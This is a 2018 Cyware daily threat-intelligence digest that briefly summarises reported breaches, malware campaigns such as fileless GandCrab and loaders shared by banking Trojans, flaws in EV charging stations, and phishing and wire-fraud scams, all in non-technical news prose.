Go to listing page

Cyware Daily Threat Intelligence December 18, 2018

Cyware Daily Threat Intelligence December 18, 2018

Share Blog Post

Top Breach Incidents Reported in the Last 24 Hours


University of Vermont Health Network breached
The University of Vermont Health Network – Elizabethtown Community Hospital recently suffered a data breach as one of their employee’s email account was remotely accessed by an unauthorized user. 32,000 potentially affected patients are being notified. The breach didn’t involve the hospital’s computer networks or electronic medical records. PIIs and limited medical data, including the Social Security Numbers, were compromised.

Twitter data breach
Another Twitter data leak occurred recently. Experts are suspecting that the Twitter’s support form was targeted by state-sponsored actors. The bug that caused the breach was immediately fixed the following day the attack was revealed. The leaked data contained country codes of the phone numbers linked to the user’s accounts.

WSJ site defaced
Recently, a page on the popular Wall Street Journal’s website was hacked and replaced with a message appearing in support of the entertainer and his quest to achieve the largest subscriber count on YouTube. Experts are not sure if PewDiePie personally endorsed the hack, or if it was merely supporters of his.

Top Malware Incidents Reported in the Last 24 Hours


URSNIF, EMOTER, DRIDEX, and BitPaymer related
Security researchers recently found out that URSNIF, EMOTER, DRIDEX, and BitPaymer banking Trojans are linked by a similar loader. Shared loaders were found to be associated with these malware families. The overview of the payload decryption procedure and the loaders’ internal data structure were also strikingly similar among the families.

Fileless GandCrab
The fileless variant of the GandCrab ransomware is found using default Windows tools, such as PowerShell and WMI, and uses them for malicious activities. This involves moving laterally to other machines without writing any artifacts or history on the disk. Attackers using this were able to log in remotely into machines which had their RDP ports open and publicly accessible. PowerShell is used to download raw text from Pastebin[.]com and execute it. Moreover, shadow file backups of Windows are deleted after the encryption.

Top Vulnerabilities Reported in the Last 24 Hours


SEO spam campaign
Researchers have recently unearthed an SEO spam injection technique. Here, the site’s source code attaches the SEO spam right after the closing HTML tag. It is expected to have already hacked 173 sites. The malware associated with this campaign adds hidden links for indexing by search engines and intercept requests to the site. Site visitors are redirected to spam content. Fake backup tables are created on the database to store spam posts and data about logged in visitors.

Flaws in Electric Vehicle Charging stations
Electric Vehicle charging stations are found to be vulnerable to an attack that could allow an attacker to hack the station remotely and prevent a car from charging. The flaws are found to be present in the chargers that are supplied by the majority of electric vehicles vendor. It can bypass authentication and connect to victim’s smartphone via Bluetooth. The Wi-Fi parameters are set for an internet connection to finish the registration by sending created user ID and GPS coordinates.

Top Scams Reported in the Last 24 Hours


‘Three Questions Quiz’ scam
Recently, the ‘three questions Quiz’ scam is being used in many phishing campaigns. The fake quizzes are customized according to the brands. The quiz starts with the use of free questions pertaining to the brand itself. The scam also tends to use language that incites a sense of urgency among the users. Even phoney social media profiles are employed to lend credence to the scam.

Galveson County data theft
Scammers are found to have stolen $500,000 from Galveson county. 2 officials are called to resign after being held responsible for the theft. As of now, the scammers have not been caught and the stolen funds have not been recovered. A fake email address is used to pose as both a county employee and a representative for the Lucas construction company. A form is also used, obtained through the county’s website, to request a change on the bank account information for the road contractor. The company is requested to make the payment via electronic transfer, instead of paying with a paper check. 

 Tags

ursnif
bitpaymer
emoter
twitter inc
galveson county
dridex

Posted on: December 18, 2018


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

The Virtual Cyber Fusion Suite